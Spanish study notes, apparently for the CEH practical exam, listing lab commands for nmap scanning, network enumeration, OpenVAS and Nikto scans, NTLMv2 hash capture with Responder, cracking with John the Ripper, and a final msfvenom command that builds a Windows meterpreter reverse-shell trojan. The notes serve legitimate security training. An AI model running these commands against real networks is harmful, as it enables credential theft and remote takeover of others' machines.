1. Fase de Escaneo
---------------
  1.1 Escaneo de la red para averiguar las máquinas
  -------------------------------------------------
  nmap -sn [direccion-red] -oN machines

  1.2 Escaneo profundo individual de cada una de las máquinas
  -----------------------------------------------------------
  nmap -A -Pn [ip_machina] -oN [W10|WS19|WS16|Ubuntu|Android]

  1.3 Devolver el escaneo en formato XML para poder insertarlo en Metasploit
  -------------------------------------------------------------------------
    Escaneo para importar a Metasploit
    ----------------------------------
    nmap -A -Pn -n 192.168.10.0/24 -oX fichero (Importante: Lanzarlo como root)
    
    Preparar Metasploit para utilizar la base de datos
    --------------------------------------------------
    - Comprobar que postgreSQL --> systemctl status postgresql
    - Conectar la base de datos a Metasploit --> msfdb init
    - Reiniciamos el servicio de postgreSQL --> systemctl restart postgresql
    
    Importar información a Metasploit
    ---------------------------------
    db_import [path]

2. Fase de enumeración
---------------------
  2.1 Extraer información acerca de carpetas compartidas - Enumeración NetBIOS
  ----------------------------------------------------------------------------
  nmap -sV -v --script nbstat.nse 192.168.10.16
  
  Enumeración NetBIOS con enum4linux
  ----------------------------------
  enum4linux -n [IP]

  2.2 Enumeración SNMP
  ---------------------
  snmp-check [ip] > snmpEnum.txt
  
  2.2.1 Enumeración SNMP de usuarios con Metasploit
  -----------------------------------
  use auxiliary/scanner/snmp/snmp_enumusers
  Nos pide el host al que vamos a escanear --> set rhosts 192.168.10.16
  
  2.3 Enumeración LDAP
  --------------------
    Desde Parrot
    ------------
    ldap -x -b "dc=ceh,dc=com" "*" -h [ip-ldap-server] --> No funciona
    
      Enumeración LDAP desde NMAP
      ---------------------------
        - Enumeración Completa
        --------------------
        nmap -p389 --script ldap-search --script-args 'ldap.username="cn=[user],cn=users,dc=[domain],dc=[TLD]",ldap.password="[pass]"' [IP]

        - Enumeración de los Usuarios, filtrando por el atributo del nombre de la cuenta
        -----------------------------------------------------------------------------------------------------
        nmap -p389 --script ldap-search --script-args 'ldap.username="cn=[user],cn=users,dc=[domain],dc=[TLD]",ldap.password="[pass]",ldap.qfilter=users,ldap.attrib=sAMAccountName' [IP]
    
    Desde Windows 10
    ----------------
    Utilizando la herramienta ADExplorer.exe de SysInternals, le indicamos la IP del Servidor LDAP y le damos a conectar.
    
  2.4 Enumeración DNS
  -------------------
   nslookup
   > server [ip-server]
   > ceh.com
   > server2016.ceh.com
  
5. Análisis de vulnerabilidades
-------------------------------
  Configuración de OpenVAS
  ---------------------------
    Crear directorios
    -----------------
    mkdir -p /var/lib/gvm/data-objects/gvmd/20.08/configs
    mkdir -p /var/lib/gvm/data-objects/gvmd/20.08/port_lists
    mkdir -p /var/lib/gvm/data-objects/gvmd/20.08/report_formats

    Descargar la información para la configuración
    ----------------------------------------------
    greenbone-feed-sync --type GVMD_DATA

    Actualizar la BD de OpenVAS desde el interfaz gráfico
    -----------------------------------------------------
    Aplicaciones/Pentesting/Análisis de Vulnerabilidades/OpenVAS - Greenbone/Update New Database

    Lanzamos OpenVAS
    ----------------
    Aplicaciones/Pentesting/Análisis de Vulnerabilidades/OpenVAS - Greenbone/Start Greenbone Vulnerability Manager Service

    Realizar un escaneo
    -------------------
    - Scans/Task/Task Wizard.
    - Indicamos la IP objetivo del escaner de vulnerabilidades.
    - Le damos a Strat Scan.

  Análisis de vulnerabilidades para Aplicaciones Web
  -----------------------------------------------------
    Ver la ayuda de Nikto
    ---------------------
    nikto -H

    Lanzar escaneo con todas las opciones disponibles
    -------------------------------------------------
    nikto -h [host] -Tuning x

    Exportar el resultado del escaneo a un fichero
    ----------------------------------------------
    nikto -h [host] -o Resultado -F txt
  
6. Hacking
----------
  Capturar Hashes con Responder
  -----------------------------
  responder -I [interfaz_red] (Mirar las interfaces de red antes ifconfig|ip address)
  
  Desde la máquina de Windows 10 hacemos lo siguiente:
   - Abrimos el explorador de ficheros.
   - Buscamos la carpeta \\CarpetaCEH.
  
  Podemos ver que en responder nos sale el Hash NTLMv2 del usuario que se ha intentado conectar.
  
  Copiamos el hash a un archivo.
  
  Ahora para romper el hash utilizamos John the Ripper.
  -----------------------------------------------------
  john --wordlist=[path-diccionario] [path-hash]
  
  En el examen ponemos el responder para ver si capturamos algún hash, dado que es posible que las máquinas estén haciendo peticiones.
  
  Atacando desde Windows 10
  -------------------------
    Para crackear passwords (Practicar con ambas herramientas de cara al examen)
    -----------------------
    - L0phtCrack
    - RainbowCrack
    
  Esteganografía
  --------------
  Este proceso se hará desde la máquina Windows 10 que nos den en el examen y tendremos las siguientes herramientas:
   - OpenStego (Imágenes).
   - SNOW (Espacios en blanco).
  
  En este desafío nos darán una imagen y nos dirán que hay algo oculto, en un desafío previo habremos conseguido la contraseña.
  
  Crear un troyano con metasploit
  -------------------------------
  msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP] LPORT=[port] 
  
  
